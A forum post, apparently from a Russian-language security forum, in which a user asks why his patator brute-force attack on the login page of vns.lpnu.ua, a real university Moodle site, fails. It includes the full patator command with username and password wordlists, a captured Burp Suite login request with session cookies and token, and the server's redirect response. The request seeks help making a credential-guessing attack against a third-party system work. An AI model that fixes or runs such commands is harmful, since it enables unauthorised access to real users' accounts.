Andrey Methew
Member
Пробовал разными способами и по всякому, через HYDRA тепер через patator пробывал. Всегда одна проблема, ответы на все запросы положительные или все отрицательные хоть в файлах находиться заведомо робочий логин и пароль. Сайт определьоно использует redirect, но с добавлением следования любому редиректу ничего не меняеться. Какой мне запрос отправить чтоб все заработало? Помогите так как єто часть курсовой работы, прошу!
Все данные взятые из Burp Suite
Сам запрос отправления:
Ответ:
Моя команда отправкизапроса через patator:
./patator.py http_fuzz url="vns.lpnu.ua /login/ index.php" method=POST body='anchor=&logintoken=&username=FILE0&password=FILE1' 0=/home/kali/log.txt 1=/home/kali/pass.txt before_urls="vns.lpnu.ua /login/ index.php" accept_cookie=1 follow=1 -x ignore:fgrep='login'
Все данные взятые из Burp Suite
Сам запрос отправления:
Код:
POST /login/index.php HTTP/1.1
Host: vns.lpnu.ua
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: http://vns.lpnu.ua
Connection: close
Referer: http://vns.lpnu.ua/login/index.php
Cookie: _ga=GA1.2.1059295513.1605731993; _gid=GA1.2.2021700960.1605731993; MoodleSession=8hu13dbbd2nnusqss947sa4abu; _gat_gtag_UA_73451727_1=1; _gat_gtag_UA_113782330_1=1; _gat_gtag_UA_123656552_1=1
Upgrade-Insecure-Requests: 1
anchor=&logintoken=8WNzAopDuASJoZhtjjQXqDRgIAv435QF&username=my_name&password=234243243
Ответ:
HTML:
HTTP/1.1 303 See Other
Date: Thu, 19 Nov 2020 14:24:23 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c
X-Powered-By: PHP/7.4.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Language: en
Location: http://vns.lpnu.ua/login/index.php
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 432
<!DOCTYPE html>
<html lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Redirect</title>
</head>
<body>
<div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">
This page should automatically redirect. If nothing is happening please use the continue link below.<br />
<a href="http://vns.lpnu.ua/login/index.php">Continue</a>
</div>
</body>
</html>
Моя команда отправкизапроса через patator:
./patator.py http_fuzz url="vns.lpnu.ua /login/ index.php" method=POST body='anchor=&logintoken=&username=FILE0&password=FILE1' 0=/home/kali/log.txt 1=/home/kali/pass.txt before_urls="vns.lpnu.ua /login/ index.php" accept_cookie=1 follow=1 -x ignore:fgrep='login'
Последнее редактирование: